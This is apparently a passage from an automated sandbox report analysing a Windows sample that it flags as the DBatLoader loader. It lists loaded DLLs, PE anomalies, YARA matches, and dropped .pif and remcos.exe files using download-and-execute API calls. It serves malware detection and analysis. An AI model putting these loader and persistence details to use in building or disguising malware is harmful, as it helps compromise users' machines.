              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: winhttpcom.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: udVh4Ist4Z.exeStatic file information: File size 1639424 > 1048576
              Source: udVh4Ist4Z.exeStatic PE information: Raw size of DATA is bigger than: 0x100000 < 0x114800
              Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: udVh4Ist4Z.exe, 00000000.00000002.2159718541.0000000014087000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2133857707.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2134174462.000000007F130000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2164505555.000000007F180000.00000004.00001000.00020000.00000000.sdmp, nmfsxfjX.pif, 0000000A.00000001.2293209618.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, nmfsxfjX.pif, 00000010.00000001.2559054856.0000000000B40000.00000040.00000001.00020000.00000000.sdmp
              Source: Binary string: easinvoker.pdb source: udVh4Ist4Z.exe, 00000000.00000002.2159718541.0000000014087000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2133857707.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2159718541.0000000014027000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2164505555.000000007F180000.00000004.00001000.00020000.00000000.sdmp, nmfsxfjX.pif, 0000000A.00000001.2293209618.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, nmfsxfjX.pif, 00000010.00000001.2559054856.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, easinvoker.exe.0.dr
              Source: Binary string: easinvoker.pdbH source: udVh4Ist4Z.exe, 00000000.00000002.2159718541.0000000014087000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2133857707.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2159718541.0000000014027000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2134401693.0000000014E81000.00000004.00000020.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2164505555.000000007F180000.00000004.00001000.00020000.00000000.sdmp, nmfsxfjX.pif, 0000000A.00000001.2293209618.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, nmfsxfjX.pif, 00000010.00000001.2559054856.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, easinvoker.exe.0.dr

              Data Obfuscation

              barindex
              Yara detected DBatLoader
              Source: Yara matchFile source: 0.2.udVh4Ist4Z.exe.2cbe308.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.udVh4Ist4Z.exe.2d60000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.udVh4Ist4Z.exe.2c59910.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.udVh4Ist4Z.exe.2c9ce08.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.udVh4Ist4Z.exe.2cbe308.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000F.00000002.2561591986.0000000002E21000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.2296612772.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2148072025.0000000002C60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: nmfsxfjX.pif.0.drStatic PE information: 0x9E9038DB [Sun Apr 19 22:51:07 2054 UTC]
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeCode function: 0_2_02D77AC0 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,0_2_02D77AC0
              Source: initial sampleStatic PE information: section where entry point is pointing to: .
              Source: remcos.exe.6.drStatic PE information: real checksum: 0x0 should be: 0x1768a
              Source: netutils.dll.0.drStatic PE information: real checksum: 0x2c00d should be: 0x1f08e
              Source: nmfsxfjX.pif.0.drStatic PE information: real checksum: 0x0 should be: 0x1768a
              Source: udVh4Ist4Z.exeStatic PE information: real checksum: 0x0 should be: 0x19fb50
              Source: Xjfxsfmn.PIF.5.drStatic PE information: real checksum: 0x0 should be: 0x19fb50
              Source: remcos.exe.10.drStatic PE information: real checksum: 0x0 should be: 0x1768a
              Source: easinvoker.exe.0.drStatic PE information: section name: .imrsiv
              Source: netutils.dll.0.drStatic PE information: section name: .
              Source: netutils.dll.0.drStatic PE information: section name: .
              Source: netutils.dll.0.drStatic PE information: section name: .
              Source: netutils.dll.0.drStatic PE information: section name: .
              Source: netutils.dll.0.drStatic PE information: section name: .
              Source: netutils.dll.0.drStatic PE information: section name: .
              Source: netutils.dll.0.drStatic PE information: section name: .
              Source: netutils.dll.0.drStatic PE information: section name: .
              Source: netutils.dll.0.drStatic PE information: section name: .
              Source: netutils.dll.0.drStatic PE information: section name: .
              Source: netutils.dll.0.drStatic PE information: section name: .
              Source: netutils.dll.0.drStatic PE information: section name: /4
              Source: netutils.dll.0.drStatic PE information: section name: /19
              Source: netutils.dll.0.drStatic PE information: section name: /31
              Source: netutils.dll.0.drStatic PE information: section name: /45
              Source: netutils.dll.0.drStatic PE information: section name: /57
              Source: netutils.dll.0.drStatic PE information: section name: /70
              Source: netutils.dll.0.drStatic PE information: section name: /81
              Source: netutils.dll.0.drStatic PE information: section name: /92
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeCode function: 0_3_0296009D push dword ptr [esi-5D3DF0BBh]; retf 0_3_029600B1
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeCode function: 0_3_02962BAE push dword ptr [esi-5D3D056Dh]; iretd 0_3_02962BB5
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeCode function: 0_3_029623C9 push dword ptr [esi-5D3D05BBh]; iretd 0_3_029623DD
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeCode function: 0_3_02A8C6F9 push cs; retf 0_3_02A8C6FE
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeCode function: 0_3_02A7D0DF push esi; ret 0_3_02A7D0EC
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeCode function: 0_3_02A8802D push ss; retf 0_3_02A88053
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeCode function: 0_3_02A8C120 push es; retf 0_3_02A8C12B
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeCode function: 0_3_02A8C6F9 push cs; retf 0_3_02A8C6FE
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeCode function: 0_3_02A7D0DF push esi; ret 0_3_02A7D0EC
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeCode function: 0_3_02A8802D push ss; retf 0_3_02A88053
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeCode function: 0_3_02A8C120 push es; retf 0_3_02A8C12B
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeCode function: 0_2_02D632F0 push eax; ret 0_2_02D6332C
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeCode function: 0_2_02D8A2F4 push 02D8A35Fh; ret 0_2_02D8A357
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeCode function: 0_2_02D7D20C push ecx; mov dword ptr [esp], edx0_2_02D7D211
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeCode function: 0_2_02D66374 push 02D663CFh; ret 0_2_02D663C7
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeCode function: 0_2_02D66372 push 02D663CFh; ret 0_2_02D663C7
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeCode function: 0_2_02D8A0AC push 02D8A125h; ret 0_2_02D8A11D
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeCode function: 0_2_02D73027 push 02D73075h; ret 0_2_02D7306D
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeCode function: 0_2_02D73028 push 02D73075h; ret 0_2_02D7306D
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeCode function: 0_2_02D8A1F8 push 02D8A288h; ret 0_2_02D8A280
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeCode function: 0_2_02D8A144 push 02D8A1ECh; ret 0_2_02D8A1E4
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeCode function: 0_2_02D66740 push 02D66782h; ret 0_2_02D6677A
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeCode function: 0_2_02D6673E push 02D66782h; ret 0_2_02D6677A
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeCode function: 0_2_02D6D55C push 02D6D588h; ret 0_2_02D6D580
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeCode function: 0_2_02D6C528 push ecx; mov dword ptr [esp], edx0_2_02D6C52D
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeCode function: 0_2_02D6CBA8 push 02D6CD2Eh; ret 0_2_02D6CD26
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeCode function: 0_2_02D89B58 push 02D89D76h; ret 0_2_02D89D6E
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeCode function: 0_2_02D79B58 push 02D79B90h; ret 0_2_02D79B88
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeCode function: 0_2_02D6C8D6 push 02D6CD2Eh; ret 0_2_02D6CD26
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeCode function: 0_2_02D778C8 push 02D77945h; ret 0_2_02D7793D
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeCode function: 0_2_02D76904 push 02D769AFh; ret 0_2_02D769A7

              Persistence and Installation Behavior

              barindex
              Drops PE files with a suspicious file extension
              Source: C:\Windows\SysWOW64\extrac32.exeFile created: C:\Users\Public\Libraries\Xjfxsfmn.PIFJump to dropped file
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeFile created: C:\Users\Public\Libraries\nmfsxfjX.pifJump to dropped file
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 6_1_00406EB0 ShellExecuteW,URLDownloadToFileW,6_1_00406EB0
              Source: C:\Windows\SysWOW64\extrac32.exeFile created: C:\Users\Public\Libraries\Xjfxsfmn.PIFJump to dropped file
